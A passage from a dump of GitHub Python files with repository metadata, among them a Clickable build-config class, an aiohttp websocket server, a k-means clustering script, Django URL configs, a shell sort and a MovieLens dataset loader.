Please speak clearly.\")\n except sr.RequestError as e:\n print(\"AI: There was an error in recognizing your speech; {0}\".format(e))\n","repo_name":"thesanju/GPT_voice_assistant","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39407535068","text":"a = []\nwhile True:\n print('='*30)\n b = int(input('Digite um número inteiro: '))\n if b not in a:\n a.append(b)\n print('Adicionado com sucesso!')\n else:\n print('Esse número já foi adicionado anteriormente.')\n c = str(input('Deseja continuar? [S/N]: ')).upper().strip()\n print('='*30)\n if c == 'N':\n break\nprint(f'Você digitou os valores {a.sort()}')\n","repo_name":"igorvalamiel/material-python","sub_path":"Exercícios - Mundo 3/079.py","file_name":"079.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4944228765","text":"import os\n\nfrom clickable.utils import (\n merge_make_jobs_into_args,\n flexible_string_to_list,\n make_absolute,\n)\nfrom clickable.exceptions import ClickableException\nfrom clickable.logger import logger\nfrom .constants import Constants\nfrom collections import OrderedDict\nimport multiprocessing\nimport platform\n\n\nclass LibConfig(object):\n cwd = os.getcwd()\n config = {}\n\n placeholders = OrderedDict({\n \"ARCH_TRIPLET\": \"arch_triplet\",\n \"NAME\": \"name\",\n \"ROOT\": \"root_dir\",\n \"BUILD_DIR\": \"build_dir\",\n \"SRC_DIR\": \"src_dir\",\n \"INSTALL_DIR\": \"install_dir\",\n })\n accepts_placeholders = [\"root_dir\", \"build_dir\", \"src_dir\", \"install_dir\",\n \"build\",\n \"build_args\", \"make_args\", \"postmake\", \"postbuild\",\n \"prebuild\",\n \"env_vars\", \"build_home\"]\n\n path_keys = ['root_dir', 'build_dir', 'src_dir', 'install_dir',\n 'build_home']\n required = ['builder']\n flexible_lists = ['dependencies_host', 'dependencies_target',\n 'dependencies_ppa', 'dependencies_build',\n 'build_args', 'make_args']\n builders = [Constants.QMAKE, Constants.CMAKE, Constants.CUSTOM]\n\n first_docker_info = True\n container_mode = False\n use_nvidia = False\n gopath = None\n verbose = False\n\n def __init__(self, name, json_config, arch, root_dir, qt_version, debug_build, verbose):\n # Must come after ARCH_TRIPLET to avoid breaking it\n self.placeholders.update({\"ARCH\": \"arch\"})\n\n self.qt_version = qt_version\n self.debug_build = debug_build\n self.verbose = verbose\n\n self.set_host_arch()\n self.container_list = list(Constants.container_mapping[self.host_arch].values())\n\n self.config = {\n 'name': name,\n 'arch': arch,\n 'arch_triplet': None,\n 'template': None,\n 'builder': None,\n 'postmake': None,\n 'prebuild': None,\n 'build': None,\n 'postbuild': None,\n 'build_dir': '${ROOT}/build/${ARCH_TRIPLET}/${NAME}',\n 'build_home': '${BUILD_DIR}/.clickable/home',\n 'src_dir': '${ROOT}/libs/${NAME}',\n 'root_dir': root_dir,\n 'dependencies_build': [],\n 'dependencies_host': [],\n 'dependencies_target': [],\n 'dependencies_ppa': [],\n 'make_jobs': None,\n 'docker_image': None,\n 'build_args': [],\n 'env_vars': {},\n 'make_args': [],\n 'install_dir': '${BUILD_DIR}/install',\n 'image_setup': {},\n 'test': 'ctest',\n }\n\n # TODO remove support for deprecated \"template\" in clickable.json\n if \"template\" in json_config:\n logger.warning('Parameter \"template\" is deprecated in clickable.json. 
Use \"builder\" as drop-in replacement instead.')\n json_config[\"builder\"] = json_config[\"template\"]\n json_config[\"template\"] = None\n\n self.config.update(json_config)\n if self.config[\"docker_image\"]:\n self.is_custom_docker_image = True\n else:\n self.is_custom_docker_image = False\n\n self.cleanup_config()\n\n self.config['arch_triplet'] = Constants.arch_triplet_mapping[self.config['arch']]\n\n for key in self.path_keys:\n if key not in self.accepts_placeholders and self.config[key]:\n self.config[key] = os.path.abspath(self.config[key])\n\n self.substitute_placeholders()\n self.set_env_vars()\n\n self.check_config_errors()\n\n for key, value in self.config.items():\n logger.debug('Lib {} config value {}: {}'.format(name, key, value))\n\n def __getattr__(self, name):\n return self.config[name]\n\n def __setattr__(self, name, value):\n if name in self.config:\n self.config[name] = value\n else:\n super().__setattr__(name, value)\n\n def prepare_docker_env_vars(self):\n docker_env_vars = []\n env_dict = self.get_env_vars()\n\n env_dict[\"HOME\"] = self.config[\"build_home\"]\n\n for key, val in env_dict.items():\n docker_env_vars.append('-e {}=\"{}\"'.format(key, val))\n\n return \" \".join(docker_env_vars)\n\n def set_env_vars(self):\n os.environ.update(self.get_env_vars())\n\n def get_env_vars(self):\n env_vars = {}\n\n if self.debug_build:\n env_vars['DEBUG_BUILD'] = '1'\n\n for key, conf in self.placeholders.items():\n env_vars[key] = self.config[conf]\n\n env_vars.update(self.config['env_vars'])\n\n return env_vars\n\n def substitute(self, sub, rep, key):\n if self.config[key]:\n if isinstance(self.config[key], dict):\n self.config[key] = {k: val.replace(sub, rep) for (k, val) in self.config[key].items()}\n elif isinstance(self.config[key], list):\n self.config[key] = [val.replace(sub, rep) for val in self.config[key]]\n else:\n self.config[key] = self.config[key].replace(sub, rep)\n\n def substitute_placeholders(self):\n for key in self.accepts_placeholders:\n for sub in self.placeholders:\n rep = self.config[self.placeholders[sub]]\n self.substitute(\"${\"+sub+\"}\", rep, key)\n # TODO remove deprecated syntax $VAR\n self.substitute(\"$\"+sub, rep, key)\n if key in self.path_keys and self.config[key]:\n self.config[key] = make_absolute(self.config[key])\n\n def cleanup_config(self):\n if not self.config['make_jobs']:\n self.config['make_jobs'] = multiprocessing.cpu_count()\n self.make_args = merge_make_jobs_into_args(\n make_args=self.make_args, make_jobs=self.make_jobs)\n\n if self.config['dependencies_build']:\n self.config['dependencies_host'] += self.config['dependencies_build']\n self.config['dependencies_build'] = []\n logger.warning('\"dependencies_build\" is deprecated. 
Use \"dependencies_host\" instead!')\n\n for key in self.flexible_lists:\n self.config[key] = flexible_string_to_list(self.config[key])\n\n def check_config_errors(self):\n if not self.config['builder']:\n raise ClickableException(\n 'The clickable.json is missing a \"builder\" in library \"{}\".'.format(self.config[\"name\"]))\n\n if self.config['builder'] == Constants.CUSTOM and not self.config['build']:\n raise ClickableException(\n 'When using the \"custom\" builder you must specify a \"build\" in one the lib configs')\n\n if self.is_custom_docker_image:\n if self.dependencies_host or self.dependencies_target or self.dependencies_ppa:\n logger.warning(\n \"Dependencies are ignored when using a custom docker image!\")\n if self.image_setup:\n logger.warning(\n \"Docker image setup is ignored when using a custom docker image!\")\n\n def set_host_arch(self):\n host = platform.machine()\n self.host_arch = Constants.host_arch_mapping.get(host, None)\n\n if not self.host_arch:\n raise ClickableException(\"No support for host architecture {}\".format(host))\n\n def needs_clickable_image(self):\n return not self.container_mode and not self.is_custom_docker_image\n\n def needs_docker(self):\n return not self.container_mode\n","repo_name":"bhdouglass/clickable","sub_path":"clickable/config/libconfig.py","file_name":"libconfig.py","file_ext":"py","file_size_in_byte":7591,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"32"} +{"seq_id":"8717620968","text":"import asyncio\nfrom aiohttp import web\nimport aiohttp\nimport aiohttp_jinja2\nimport jinja2\nimport json\nimport logging\nimport os\n\nimport default_form_data\nimport state\n\nlogger = logging.getLogger('websockets')\nlogger.setLevel(logging.DEBUG)\nlogger.addHandler(logging.StreamHandler())\n\nconnected_websockets = set()\n\nasync def socket_handler(request):\n logger.info(\"New client connected\")\n\n ws = web.WebSocketResponse()\n #ws = web.WebSocketResponse(heartbeat=5.0)\n await ws.prepare(request)\n\n # Register\n connected_websockets.add(ws)\n\n # Send initial state (for page load, there's also site_handler passing this info, but\n # this is meant to cover for client reconnects)\n await ws.send_str(state.Machine().state_string())\n\n async for msg in ws:\n if msg.type == aiohttp.WSMsgType.TEXT:\n try:\n message = msg.data.strip()\n logger.info(\"Receiving message: \" + message)\n if message == '__ping__':\n # answer ping\n answer = message\n else:\n # convert json string to dict and pass along to state machine\n answer = state.Machine().on_event(json.loads(message))\n # on_event() can use send_message() to send messages to all clients,\n # but if a reply is made to the sending client only, the answer is used\n if answer:\n await ws.send_str(answer)\n logger.info(\"Answered message: \" + answer)\n except KeyError as e:\n logger.error(\"Message parsing error: \", exc_info=e)\n # Ignoring message\n except json.decoder.JSONDecodeError as e:\n logger.error(\"Message is not valid json: \", exc_info=e)\n # Ignoring message\n\n elif msg.type == aiohttp.WSMsgType.ERROR:\n logger.error('Socket connection closed with exception %s' % ws.exception())\n break\n\n elif msg.type == aiohttp.WSMsgType.CLOSED:\n logger.info('Socket connection closed')\n break\n\n else:\n logger.error(\"Unknown websocket message type\")\n break\n\n # Unregister\n logger.info(\"Client has disconnected\")\n connected_websockets.remove(ws)\n\n return ws\n\nasync def site_handler(request):\n context = {\n 'state': 
state.Machine().state_string()\n }\n context.update(default_form_data.defaults)\n response = aiohttp_jinja2.render_template(\"rpb_console.html\", request, context=context)\n return response\n\nasync def start_server_async():\n \"\"\"Start the server.\"\"\"\n logger.info(\"Starting server as a task\")\n app = web.Application()\n aiohttp_jinja2.setup(\n app, loader=jinja2.FileSystemLoader(os.getcwd())\n )\n app.add_routes([web.get('/socket.io', socket_handler)])\n app.add_routes([web.get('/', site_handler)])\n app.router.add_static('/js/', path='js', name='js')\n app.router.add_static('/img/', path='img', name='img')\n runner = web.AppRunner(app)\n await runner.setup()\n site = web.TCPSite(runner, 'localhost', 8080)\n await site.start()\n logger.info(\"Starting server as a task [ok]\")\n\n\nasync def send_message(message):\n global connected_websockets\n\n logger.info(f\"Going to send message '{message}' to all connected clients\")\n\n for ws in connected_websockets:\n logger.info(f\"Sending message...\")\n try:\n await ws.send_str(message)\n except ConnectionResetError as e:\n logger.error(f\"Socket closed: '{e}'\")\n\n","repo_name":"vicmortelmans/raspberry-pi-broadcaster","sub_path":"ws_server.py","file_name":"ws_server.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42183980823","text":"import csv\nimport math\nimport random\nimport matplotlib.pyplot as plot\n\n\nclass Program:\n\n def __init__(self):\n self._real_points = {}\n self._predicted_points = {}\n\n self._centroids = []\n self._min1 = 9999999999999999.99\n self._min2 = 9999999999999999.99\n self._max1 = -9999999999999999.99\n self._max2 = -9999999999999999.99\n\n self._counts_real = {'A': 0, 'B': 0, 'C': 0, 'D': 0}\n self._counts_predicted = [0 for _ in range(4)]\n\n self._label_to_index = {'A': None, 'B': None, 'C': None, 'D': None}\n self._index_to_label = [None for _ in range(4)]\n\n self.read_points()\n self._initialize_centroids()\n\n @staticmethod\n def euclidian_distance(p1, p2):\n return math.sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)\n\n def _initialize_centroids(self):\n # We \"created\" a minimal rectangle and not the initial centroids will be taken randomly from its inside\n for _ in range(4):\n self._centroids.append((random.uniform(self._min1, self._max1), random.uniform(self._min2, self._max2)))\n\n def read_points(self):\n with open('dataset.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n\n self._counts_real[row[0]] += 1\n\n # We are going to keep for each point the real cluster label, so basically we are going\n # to keep for every point (A, B, C or D)\n self._real_points[(float(row[1]), float(row[2]))] = row[0]\n\n # We are going to predict for each point a centroid index, so basically we are going\n # to keep into a dictionary, for every point (0, 1, 2 or 3)\n\n self._predicted_points[(float(row[1]), float(row[2]))] = None\n\n # Here we compute the coordinates in order to create the minimal rectangle\n self._min1 = min([self._min1, float(row[1])])\n self._min2 = min([self._min2, float(row[2])])\n self._max1 = max([self._max1, float(row[1])])\n self._max2 = max([self._max2, float(row[2])])\n\n def iterate(self):\n\n # For every real point, we are going to compute which centroid is closer to it\n for p in self._predicted_points:\n\n minimum_index = None\n minimum_distance = 9999999999999999.99\n\n for i in range(4):\n\n distance = 
Program.euclidian_distance(p, self._centroids[i])\n\n if distance < minimum_distance:\n minimum_distance = distance\n minimum_index = i\n\n # For each point we will store the index of the nearest centroid\n self._predicted_points[p] = minimum_index\n\n # We compute how many points are closest to each centroid\n self._counts_predicted = [0 for _ in range(4)]\n\n # We are going to sum up all the coordinates of the nearest points to each centroid in\n # Order to be able to the mean later on\n sums = [[0, 0] for _ in range(4)]\n\n for p in self._predicted_points:\n self._counts_predicted[self._predicted_points[p]] += 1\n sums[self._predicted_points[p]][0] += p[0]\n sums[self._predicted_points[p]][1] += p[1]\n\n # Now, the new centroids will be computer as the \"mean\" of all the nearest points to it\n for i in range(4):\n self._centroids[i] = (\n round(sums[i][0] / self._counts_predicted[i], 20), round(sums[i][1] / self._counts_predicted[i], 20))\n\n def _run(self, iteration_count):\n for _ in range(iteration_count):\n self.iterate()\n\n def _plot_all(self):\n colors = {0: \"pink\", 1: \"blue\", 2: \"purple\", 3: \"orange\"}\n\n for p in self._predicted_points:\n plot.scatter(p[0], p[1], color=colors[self._predicted_points[p]], marker=\".\", s=3)\n\n for index in range(4):\n plot.scatter(self._centroids[index][0], self._centroids[index][1], color=colors[index], marker=\"X\", s=50)\n\n plot.show()\n\n def map_indexes_to_labels(self):\n\n matches = {}\n # This dictionary is going to hold how many label-index associations were made in total\n # there exists in total, 16 distinct possible associations, but we will only take the top 4\n # which are the most frequent ones.\n # Those will represent the most appropriate label-index mapping\n\n for l in self._label_to_index.keys():\n for i in range(4):\n matches[(l, i)] = 0\n\n for p in self._real_points.keys():\n # For each point, we take the index of the closest predicted centroid to it\n # and the real cluster label for each\n\n label = self._real_points[p]\n index = self._predicted_points[p]\n\n # For the associated label and index, we compute how many times those two\n # were associated\n matches[(label, index)] += 1\n\n matches_pairs = []\n for k, v in matches.items():\n matches_pairs.append((k, v))\n\n matches_pairs.sort(key=lambda v: v[1], reverse=True)\n\n # So basically, after the association is done, we take the pairs ((label, index), count) and order them by\n # the count\n\n results = matches_pairs[:4]\n\n # Now, the top 4 ones, are closest to being the correct values, or at least they are very very close\n\n for p in results:\n self._label_to_index[p[0][0]] = p[0][1]\n self._index_to_label[p[0][1]] = p[0][0]\n\n # We'll organize the guesses and the real labels in a matrix, using the label-index mapping we've made.\n def _compute_guess_matrix(self):\n\n self._guesses_matrix = [[0 for _ in range(4)] for _ in range(4)]\n\n for point in self._real_points.keys():\n true_index = self._label_to_index[self._real_points[point]]\n predicted_index = self._predicted_points[point]\n self._guesses_matrix[predicted_index][true_index] += 1\n\n def _compute_for_label_measurement(self, label_index):\n \"\"\"\n for each label, i = label's index:\n true positives = m[i][i]\n true negatives = sum(m[j][k]), j, k != i -> the matrix without the current line and column\n false positives = sum(m[i][j]), j != i -> just the current row (without position [i][i])\n false negatives = sum(m[j][i]), j != i -> just the current column (without position [i][i])\n \"\"\"\n # 
TP = no. of correct guesses that a certain point belongs to the current label\n true_positive = self._guesses_matrix[label_index][label_index]\n\n true_negative, false_positive, false_negative = 0, 0, 0\n\n for i in range(4):\n\n for j in range(4):\n\n if i != label_index and j != label_index:\n # TN = Guesses that have nothing to do with the current label.\n true_negative += self._guesses_matrix[i][j]\n elif i == label_index and j != label_index:\n # FP = Points that were wrongly guessed as being part of the current label.\n false_positive += self._guesses_matrix[i][j]\n elif i != label_index and j == label_index:\n # FN = Points that should've been guessed as being part of the current label.\n false_negative += self._guesses_matrix[i][j]\n\n return [true_positive, true_negative, false_positive, false_negative]\n\n def execute(self):\n\n self._run(200)\n self.map_indexes_to_labels()\n\n print(self._label_to_index)\n\n self._compute_guess_matrix()\n\n print(self._guesses_matrix)\n\n TP = 0\n TN = 0\n FP = 0\n FN = 0\n\n for index in range(4):\n ms = self._compute_for_label_measurement(index)\n print(ms)\n TP += ms[0]\n TN += ms[1]\n FP += ms[2]\n FN += ms[3]\n\n ATP = TP / 4\n ATN = TN / 4\n AFP = FP / 4\n AFN = FN / 4\n\n accuracy = (ATP + ATN) / (ATP + ATN + AFP + AFN)\n precision = ATP / (ATP + AFP)\n rappel = ATP / (ATP + AFN)\n score = 2 * precision * rappel / (precision + rappel)\n\n print(\"Avg. accuracy: \" + str(accuracy * 100) + \"%\")\n print(\"Avg. precision: \" + str(precision * 100) + \"%\")\n print(\"Avg. rappel: \" + str(rappel * 100) + \"%\")\n print(\"Avg. score: \" + str(score * 100) + \"%\")\n\n self._plot_all()\n","repo_name":"AlexandraBledea/Sem4-AI","sub_path":"Assignments/Lab7/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":8543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27595059035","text":"from django.urls import re_path as url\nfrom . 
import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib.auth.views import LoginView, LogoutView\nfrom django.urls import path\n\n\nurlpatterns=[\n path('',views.index,name = 'index'),\n path('contacts',views.contacts, name = 'contacts'),\n url('signup', views.signup, name='signup'),\n path('login', LoginView.as_view(), name='login_url'),\n path('user/', views.profile, name='profile'),\n path('user/edit_profile/', views.edit_profile, name='edit_profile'),\n path('logout/', LogoutView.as_view(next_page='login_url'), name='logout_url'),\n path('accounts/profile/', views.profile, name='profile'),\n path('post',views.add_post,name='post'),\n path('search/', views.search_business, name='search'),\n path('business',views.business,name = 'business'),\n \n # path('edit_profile/',views.edit_profile, name='edit_profile'),\n # url(r'^api/business/$', views.BusinessList.as_view()),\n # url(r'^edit_profile/(?P\\w{0,50})',views.edit_profile, name='edit_profile'),\n]\nif settings.DEBUG:\n urlpatterns+= static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)\n","repo_name":"maureen-james/my_neighbourhood","sub_path":"neighbourhood/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8267863641","text":"import random\nfrom time import time\nk =0 # comparisons\ndef shellSort(alist):\n size = len(alist)\n start =time()\n \n sublistCount = len(alist) // 2\n while sublistCount > 0:\n for startPosition in range(sublistCount):\n gapInsertionSort(alist, startPosition, sublistCount)\n sublistCount = sublistCount // 2\n end = time()\n print(size,\" items sorted in \", (end- start),\" seconds\",k,\" comparisons were made\")\n\ndef gapInsertionSort(alist, start, gap):\n for i in range(start + gap, len(alist), gap):\n currentValue = alist[i]\n position = i\n global k\n while position >= gap and \\\n alist[position - gap].getDate() > currentValue.getDate():\n k +=1\n alist[position] = alist[position - gap]\n position = position - gap\n alist[position] = currentValue\n\ndef printList(alist):\n count = 0\n for x in range(len(alist)):\n \n if count % 10 == 0:\n print()\n print(\"%10d\" % alist[x].getDate(),alist[x].getMaxTemp(),alist[x].getMinTemp(), end = \" \")\n count += 1\n \n\n\n","repo_name":"halmasha/sortmethods-evaluation","sub_path":"shellSort.py","file_name":"shellSort.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14065472596","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.LocationAPIView.as_view()),\n path('products//', views.LocationAPIView.as_view()),\n path('/department/', views.DepartmentAPIView.as_view()),\n path('/department//category/', views.CategoryAPIView.as_view()),\n path('/department//category//subcategory/', views.SubCategoryAPIView.as_view()),\n path('/department//category//subcategory//', views.SubCategoryAPIView.as_view()),\n path('skudata/', views.SKUDataAPIView.as_view()),\n]\n","repo_name":"nsanand/inmar-assignment","sub_path":"inmar/location/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29491821069","text":"from django.core.management.base import BaseCommand\nfrom ...models import Movie, Genre, Director, Actor, Writer\nimport csv\n\nclass Command(BaseCommand):\n help = 'Import movie dataset from csv'\n\n def handle(self, *args, **kwargs):\n with open('rotten_tomatoes_movies.csv', 'r', encoding='utf-8') as f:\n reader = csv.reader(f)\n\n first_row = True\n for row in reader:\n\n # skip headers\n if first_row:\n first_row = False\n continue\n\n data = {\n 'id': row[0],\n 'title': row[1],\n 'plot': row[2],\n 'rating': row[4],\n 'genre': row[5],\n 'directors': row[6],\n 'writers': row[7],\n 'actors': row[8],\n 'release_date': row[9],\n 'runtime': row[11]\n }\n\n # clean data to prevent db errors\n for key, value in data.items():\n if not value:\n data[key] = None\n\n movie, created = Movie.objects.get_or_create(\n title=data['title'],\n plot=data['plot'],\n rating=data['rating'],\n release_date=data['release_date'],\n runtime=data['runtime']\n ) \n \n if data['id']:\n movie.rotten_tomato_id = data['id']\n\n if data['genre']:\n genres = [x.strip() for x in data['genre'].split(',')]\n for genre in genres:\n genre_obj, created = Genre.objects.get_or_create(genre=genre)\n movie.genres.add(genre_obj)\n genre_obj.save()\n\n if data['directors']:\n directors = [x.strip() for x in data['directors'].split(',')]\n for director in directors:\n director_obj, created = Director.objects.get_or_create(name=director)\n movie.directors.add(director_obj)\n director_obj.save()\n\n if data['actors']:\n actors = [x.strip() for x in data['actors'].split(',')]\n for actor in actors:\n actor_obj, created = Actor.objects.get_or_create(name=actor)\n movie.actors.add(actor_obj)\n actor_obj.save()\n\n if data['writers']:\n writers = [x.strip() for x in data['writers'].split(',')]\n for writer in writers:\n writer_obj, created = Writer.objects.get_or_create(name=writer)\n movie.writers.add(writer_obj)\n writer_obj.save()\n\n movie.save()\n","repo_name":"nbrix/my-critic","sub_path":"movies/management/commands/import_movie_dataset.py","file_name":"import_movie_dataset.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16966271940","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 17 14:32:02 2019\n\n@author: raphael\n\"\"\"\nimport csv\nfrom scipy.stats import linregress\nimport numpy as np\n\n\nwith open('../Data/commenters.csv', 'r') as to_read:\n csvr = csv.reader(to_read)\n header = next(csvr)\n for line in csvr:\n community, snapshot, commenter_count = (int(x) for x in line)\n if not community in metrics_per_com:\n continue\n if not 'nb_commenters' in metrics_per_com[community]: \n metrics_per_com[community]['nb_commenters'] = []\n 
metrics_per_com[community]['nb_commenters'].append((snapshot, commenter_count))\n\nclass indicators(object):\n \n def slope(self):\n slope_per_com = {} \n mean_per_com = {} \n lifetime_per_com = {} \n for com in metrics_per_com:\n slope_per_com[com] = {}\n mean_per_com[com] = {}\n for indic in metrics_per_com[com]:\n these_indics = metrics_per_com[com][indic]\n x = [x[0] for x in these_indics]\n y = [x[1] for x in these_indics]\n slope, intercept, r_value, p_value, std_err = linregress(x, y)\n slope_per_com[com][indic] = slope\n mean_per_com[com][indic] = np.mean(y)\n lifetime_per_com[com] = len(metrics_per_com[com]['nb_members'])\n\nnb_snapshot_per_community = {}\nsemantic_metrics = {}\nwith open('../Results/semantic_metrics.csv', 'r') as to_read:\n csvr = csv.reader(to_read)\n header = next(csvr)\n for line in csvr:\n community = int(line[0])\n snapshot = int(line[1])\n gini = float(line[-1])\n if not community in nb_snapshot_per_community:\n nb_snapshot_per_community[community] = 0\n semantic_metrics[community] = {}\n nb_snapshot_per_community[community] += 1\n semantic_metrics[community][snapshot] = {'gini' : float(gini)}\n \nsankey_metrics = {}\nwith open('../Results/sankey_metrics.csv', 'r') as to_read:\n csvr = csv.reader(to_read)\n header = next(csvr)\n for line in csvr:\n community = int(line[0])\n snapshot = int(line[1])\n if not nb_snapshot_per_community.get(community, 0) > 1:\n continue\n if not community in sankey_metrics:\n sankey_metrics[community] = {snapshot : {}}\n if not snapshot in sankey_metrics[community]:\n sankey_metrics[community][snapshot] = {}\n for i in range(2, len(line)):\n sankey_metrics[community][snapshot][header[i]] = int(line[i])\n \nlist_indics = ['d_in', 'd_out', 'nb_members']\nmetrics_per_com = {} \nfor com in sankey_metrics:\n metrics_per_com[com] = {}\n for indic in list_indics:\n metrics_per_com[com][indic] = []\n for snapshot in sankey_metrics[com]:\n metrics_per_com[com][indic].append((snapshot, sankey_metrics[com][snapshot][indic]))\n metrics_per_com[com]['gini'] = []\n for snapshot in semantic_metrics[com]:\n metrics_per_com[com]['gini'].append((snapshot, semantic_metrics[com][snapshot]['gini']))\n \nfor snapshot in range(6): \n list_edges = [] \n nodes_per_com = {}\n degree_per_vertex = {}\n out_per_vertex = {}\n with open('../Data/edgelists_2019-04-18_102000/edgelist_%s.csv' % snapshot, 'r') as to_read:\n csvr = csv.reader(to_read)\n next(csvr)\n for line in csvr:\n s, v1, v2, com1, com2, ltype = line\n if v1 == v2:\n continue\n if (v1,v2) in list_edges or (v2, v1) in list_edges:\n continue\n list_edges.append((v1,v2))\n com1 = int(com1)\n if not com1 in metrics_per_com:\n continue\n if not com1 in nodes_per_com:\n nodes_per_com[com1] = set()\n if not v1 in degree_per_vertex:\n degree_per_vertex[v1] = 0\n degree_per_vertex[v1] += 1\n if not v1 in out_per_vertex:\n out_per_vertex[v1] = 0\n if ltype == 'out':\n out_per_vertex[v1] += 1\n nodes_per_com[com1].add(v1)\n \n for community in nodes_per_com: \n nodes_per_com[community] = list(nodes_per_com[community])\n if not 'odf' in metrics_per_com[community]:\n metrics_per_com[community]['odf'] = []\n \n list_odf = []\n for v in nodes_per_com[community]:\n list_odf.append(out_per_vertex[v] / float(degree_per_vertex[v]))\n metrics_per_com[community]['odf'].append((snapshot, np.mean(list_odf)))\n \n \n\n \n \n\nlist_indics = list_indics + ['gini', 'odf', 'nb_commenters'] \nwith open('../Results/metrics_per_community.csv', 'w') as to_write:\n csvw = csv.writer(to_write)\n csvw.writerow(['community'] + 
['slope_%s' % indic for indic in list_indics] + ['mean_%s' % indic for indic in list_indics] + ['lifetime'])\n for com in metrics_per_com:\n if not 'nb_commenters' in metrics_per_com[com]:\n continue\n csvw.writerow(\n [com] \n + [slope_per_com[com][indic] for indic in list_indics] \n + [mean_per_com[com][indic] for indic in list_indics] \n + [lifetime_per_com[com]]\n )\n\n","repo_name":"rcharbey/Sankey_analysis","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":5289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43288580900","text":"import torch\nfrom torch.utils.data import Dataset\nimport pandas as pd\nimport os\nimport numpy as np\nimport scipy.sparse as sparse\nimport copy\nimport random\n\nclass MovieLensDataset(Dataset):\n def __init__(self, ratings_file=None, movies_file=None, transform=None):\n \"\"\"\n Args:\n csv_file (string): Path to the csv file with annotations.\n transform (callable, optional): Optional transform to be applied\n on a sample.\n \"\"\"\n self.movie_dict = {}\n self.dataframe = MovieLensDataset.get_dataframe(ratings_file, movie_dict=self.movie_dict)\n self.movies_dataframe = MovieLensDataset.get_movies_dataframe(movies_file)\n self.matrix = self.get_matrix()\n self.user_count = self.matrix.shape[0]\n self.item_count = self.matrix.shape[1]\n self.transform = transform\n\n def __len__(self):\n return self.user_count\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n\n sample = self.matrix[idx]\n sample = torch.tensor(sample.toarray()).float().squeeze()\n\n if self.transform:\n sample = self.transform(sample)\n\n return sample, idx\n\n @staticmethod\n def get_movies_dataframe(csv_file=None):\n if not os.path.isfile(csv_file):\n raise FileNotFoundError(\"csv file not found\")\n\n df = pd.read_csv(csv_file)\n return df\n\n @staticmethod\n def get_dataframe(csv_file, movie_dict=None):\n if not os.path.isfile(csv_file):\n raise FileNotFoundError(\"csv file not found\")\n\n df = pd.read_csv(csv_file)\n df.drop(\"rating\", 1, inplace=True)\n df.drop(\"timestamp\", 1, inplace=True)\n df[\"movieId\"] = MovieLensDataset.remove_gaps(df[\"movieId\"], movie_dict=movie_dict)\n\n def minusOne(x):\n return x - 1\n\n df[\"userId\"] = df[\"userId\"].apply(minusOne)\n df[\"movieId\"] = df[\"movieId\"].apply(minusOne)\n\n return df\n\n @staticmethod\n def remove_gaps(pd_series, movie_dict=None, flip=True):\n real_count = len(pd_series.unique())\n\n for i in range(1, real_count + 1):\n movie_dict[i-1] = pd_series.max()\n pd_series.replace(pd_series.max(), i*(-1), inplace=True)\n\n def positify(x):\n return x * (-1)\n\n pd_series = pd_series.apply(positify)\n\n if flip:\n pd_series = pd_series * (-1) + max(pd_series) + 1\n\n dict_max = max(list(movie_dict.values()))\n for key in movie_dict:\n val = movie_dict[key]\n new_val = (val * (-1)) + dict_max + 1\n movie_dict[key] = new_val\n\n return pd_series\n\n def get_matrix(self):\n item_count = self.dataframe[\"movieId\"].max()\n user_count = self.dataframe[\"userId\"].max()\n\n row = self.dataframe[\"userId\"]\n col = self.dataframe[\"movieId\"]\n data = np.ones((len(self.dataframe)))\n\n return sparse.csr_matrix((data, (row, col)), shape=(user_count + 1, item_count + 1))\n\n def get_movie(self, index):\n real_id = self.movie_dict[index]\n row = self.movies_dataframe[self.movies_dataframe[\"movieId\"] == real_id]\n title = row[\"title\"].values[0]\n genres = row[\"genres\"].values[0]\n\n ret = f\"#{real_id}: 
